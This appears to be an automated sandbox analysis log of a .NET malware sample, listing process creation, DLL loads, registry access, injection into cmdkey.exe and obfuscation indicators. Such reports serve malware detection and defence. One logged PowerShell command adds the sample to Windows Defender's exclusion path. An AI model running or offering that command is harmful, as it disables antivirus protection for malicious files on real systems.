            Source: unknownProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\r9856_7.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeProcess created: C:\Users\user\Desktop\r9856_7.exe "C:\Users\user\Desktop\r9856_7.exe"Jump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeProcess created: C:\Windows\SysWOW64\cmdkey.exe "C:\Windows\SysWOW64\cmdkey.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\GWNKSXVIhHFKKSDRIHofHaNICfqBnvAGLynAZzaRrbuhumAWkWEuWTEvNyZDRhqiBItCq\NhrnLLOsLetD.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\r9856_7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\r9856_7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmdkey.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: r9856_7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: r9856_7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: r9856_7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NhrnLLOsLetD.exe, 00000007.00000002.3815465692.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp, NhrnLLOsLetD.exe, 0000000A.00000002.3815330168.0000000000F6E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: cmdkey.pdbGCTL source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: r9856_7.exe, r9856_7.exe, 00000004.00000002.1544042042.00000000010B0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, cmdkey.exe, 00000008.00000003.1545713405.00000000032FA000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000003.1543650837.000000000314C000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000008.00000002.3817247485.000000000363E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: djdH.pdb source: r9856_7.exe
            Source: Binary string: cmdkey.pdb source: r9856_7.exe, 00000004.00000002.1543682114.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, NhrnLLOsLetD.exe, 00000007.00000002.3814863192.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: djdH.pdbSHA256L source: r9856_7.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: r9856_7.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.7610000.4.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 0.2.r9856_7.exe.42be050.1.raw.unpack, sbGWalEaq1DaO7LRgs.cs.Net Code: FZnA5IudJV System.Reflection.Assembly.Load(byte[])
            Source: 8.2.cmdkey.exe.3accd14.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.0.NhrnLLOsLetD.exe.335cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 10.2.NhrnLLOsLetD.exe.335cd14.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 12.2.firefox.exe.261acd14.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: r9856_7.exeStatic PE information: 0xD9557E98 [Wed Jul 18 01:40:40 2085 UTC]
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 0_2_02E75E0A pushfd ; iretd 0_2_02E75E19
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040C8B7 push ss; ret 4_2_0040C8BB
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00417953 push eax; ret 4_2_0041798E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00414157 push ecx; ret 4_2_00414158
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0041798A push eax; ret 4_2_0041798E
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00406AF7 push es; iretd 4_2_00406AF9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_0040D3D3 push edx; retf 4_2_0040D3E9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00415C31 pushfd ; ret 4_2_00415C38
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004034F0 push eax; ret 4_2_004034F2
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_004134B3 push 3ABD5B85h; ret 4_2_004134BE
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00408717 push ecx; iretd 4_2_00408718
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_00411FB7 push eax; retf 4_2_00411FC8
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B225F pushad ; ret 4_2_010B27F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B27FA pushad ; ret 4_2_010B27F9
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010E09AD push ecx; mov dword ptr [esp], ecx4_2_010E09B6
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B283D push eax; iretd 4_2_010B2858
            Source: C:\Users\user\Desktop\r9856_7.exeCode function: 4_2_010B1366 push eax; iretd 4_2_010B1369
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_034D09AD push ecx; mov dword ptr [esp], ecx8_2_034D09B6
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A14497 push eax; ret 8_2_00A1449B
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A14460 push eax; ret 8_2_00A1449B
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A2046E push ebx; iretd 8_2_00A20473
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A1E750 push ebp; retf 5D5Dh8_2_00A1E821
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0EAC4 push eax; retf 8_2_00A0EAD5
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A16F24 push edi; retf 8_2_00A16F25
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A05224 push ecx; iretd 8_2_00A05225
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A093C4 push ss; ret 8_2_00A093C8
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A23690 push FFFFFF83h; iretd 8_2_00A2370D
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A03604 push es; iretd 8_2_00A03606
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A1B8FA push eax; ret 8_2_00A1B8FB
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_00A0FFC0 push 3ABD5B85h; ret 8_2_00A0FFCB
            Source: C:\Windows\SysWOW64\cmdkey.exeCode function: 8_2_033360BB push ecx; retf 8_2_033360DF
            Source: r9856_7.exeStatic PE information: section name: .text entropy: 7.8614274357019545
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, Pa5GaI7WaJYAkD0PPP.csHigh entropy of concatenated method names: 'YUlIgunKJO7rs9AQAUT', 'fAUxKCnGH3kWudcPOeu', 'zarpyJnTw01kXPdO9r1', 'Rb99rwKBA7', 'UXd9FlJwmc', 'o8e93k0HSv', 'NWYWdqnH7ZtIyvBUbFJ', 'HqHLexnSLTF6ngXyy5Y'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, gj7iW9mnV0ZbVLwQov.csHigh entropy of concatenated method names: 'SbprLVGJfn', 'l25rHxYPmH', 'EJurpCV3hK', 'kDsr885XYl', 'EVLrV89hul', 'Ar7rbThlXp', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, R5WHd7jjS2qu79hBQr.csHigh entropy of concatenated method names: 'tkT4QAg8Xn', 'gA14XrhvvR', 'ykcrhafsRs', 'EJdrek0k1j', 'iVk4JUPlij', 'NFw4I3qyRE', 'zg54larQhV', 'KpP4VuFSvq', 'oba4whdNFj', 'Arm4cHNPbL'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, sbGWalEaq1DaO7LRgs.csHigh entropy of concatenated method names: 'dwG0ETeMBO', 'lqX07aM3hQ', 'wSU0gO9agK', 'Rqp0aqc1Q7', 'T5M0Kkf0Ic', 'HFp09EcMtu', 'NLZ0RZV03w', 'CjH0oBRZge', 'L0i0ddMIVw', 'lQb0f9V2LZ'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, riHfqebJ9xCisJtmEG.csHigh entropy of concatenated method names: 'ICe4fxkBXp', 'pga4YaAgKW', 'ToString', 'g3n47IqjH0', 'yDn4gmoHG4', 'Rkc4am4smG', 'q3v4K5VDuD', 'vqb49rObOb', 'J8b4RbO4he', 'xo74o6Rq78'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, uecTtq5OpMxGjAuSBN.csHigh entropy of concatenated method names: 'PfD5DWaua', 'VNWUC5sEH', 'LUsDTGyI5', 'MlFmWjG54', 'XEeSXYYIA', 'cFQnFtVxP', 'Pm9taXblTm2O1HaGEq', 'mSpXZIhxASA5KsPsDB', 'eRMrQHwuW', 'FE43rK9jY'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, koxQO7xoh3cB9rglS7.csHigh entropy of concatenated method names: 'tXHKssZC8D', 'VJgKmaeLd4', 'YaKappCgmh', 'PFya8ohXlH', 'yphabL1xQr', 'EBJaW05mr8', 'RJeatTKPPy', 'lYvaOLv7Zc', 'JkYakeVdQR', 'XpoajD7ZbK'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, yLcVqjAhUsybQFpIrK.csHigh entropy of concatenated method names: 'exjgVFTqrO', 'YZFgwuwkN2', 'u9DgcgAgbw', 'G8UgMp8V51', 'xYZgZFwfgN', 'FJSgCLbk3O', 'YOOg176vPG', 'SGqgQNvqF0', 'gpUgynNZAn', 'FGJgXgSgGA'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, WUZljehAB4HeM46ncF.csHigh entropy of concatenated method names: 'v4rR78b9EJ', 'rJjRaETjIB', 'tvER9bIG94', 'gbd9XEUDBn', 'MTL9zSxNdA', 'fLnRhSF6ri', 'PrLReEcqpZ', 'BIvRxU6XBq', 'sTvR0JRemt', 'Q4rRAKDBvY'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, D9miIsXwhww83cgMvM.csHigh entropy of concatenated method names: 'o2ERBfNT4l', 'gIrRPgQkMR', 'QybR5vi49y', 'caURUBtrtw', 'IGtRsSIyMo', 's14RDYdV8S', 'CGLRmEfSjO', 'ooFRvNNW53', 'etqRS30GIL', 'yCHRn7KQy3'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, RlL94mzCIBEtWS97Xi.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SLJF6PuBQB', 'yyZFqYk4nX', 'XclF2EHeuo', 'O5ZF4mGm4O', 'Jw1Fr2kh3c', 'OlMFFf8J5i', 'S14F3Jd9Ml'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, dC2uWYCAb7Qhq9O8jj.csHigh entropy of concatenated method names: 'njeaUiIWDF', 'nPiaD8Crti', 'nkcavuj5uu', 'UkYaSXJ16l', 'glTaqtTPsa', 'wf0a2VpniN', 'wC4a4W5DL2', 'TSrarPJn0o', 'EfFaFMQ492', 'fqba3aEmXY'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, uCPM2lWJOst0iVkmxT.csHigh entropy of concatenated method names: 'QqVFeplcZq', 'nv0F0rxkxO', 'sLpFALn6S1', 'uurF77yY2t', 'oWeFgiUbuG', 'ABKFKZi5n0', 'aobF9kJXPt', 'rGMr1omEdd', 'NmIrQQ6ViE', 'HSrryS9QHF'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, Vd8QHTOMg7OJIsN9YM.csHigh entropy of concatenated method names: 'VvZeRUWKog', 'yRceotDeMS', 'NGcefTUdNM', 'M8weY0HxH1', 'iDBeqiStj2', 'd7Ye2uX3Mf', 'mja4UAOGpHd4uBjpva', 'X8jtE5Unat4peMi7KL', 'TXXeeXFkLX', 'LLje0UubfK'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, zAd6VDKK5y7evjsyJIj.csHigh entropy of concatenated method names: 'ToString', 'cRZ30RgDXT', 'KFG3AWWFEd', 'Cef3Eb6yIU', 'pHZ37YA02f', 'ncc3gTXvPK', 'J8h3amo5Ib', 'oXH3Kfs6Qa', 'sBF2qDLNjMGXVxbjkmC', 'vxiM0BLu19p7uh87AeY'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, QPTvFwygSCUM3wR1kg.csHigh entropy of concatenated method names: 'xUX6v8tSRY', 'G5k6SAu3Pl', 'o8K6LMPh9u', 'mQo6HxbP3t', 'HCy68weo1f', 'qIl6baMU7i', 'ven6tX00Oo', 'Qwv6Ob6KTb', 'W396jHBhdN', 'lJ96J2LC5b'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, iWp7neG5i0XxENSU0d.csHigh entropy of concatenated method names: 'ToString', 'NK62Jqs2Ai', 'xc92HLqk47', 'sbA2pQCLHq', 'Qmb28qYqUi', 'cmw2bOyqe3', 'rEa2WURIvo', 'JBt2tYsM7v', 'EEL2OZ5nig', 'O0f2kC5ALa'
            Source: 0.2.r9856_7.exe.4345670.2.raw.unpack, biAsJiKwakSjilHmdMS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SVM3V1f0RV', 'rMI3w5secu', 'Iat3cKTf9N', 'los3MXmQ7c', 'uO53ZGViyl', 'RLc3CtkuYU', 'glk31HlkK3'
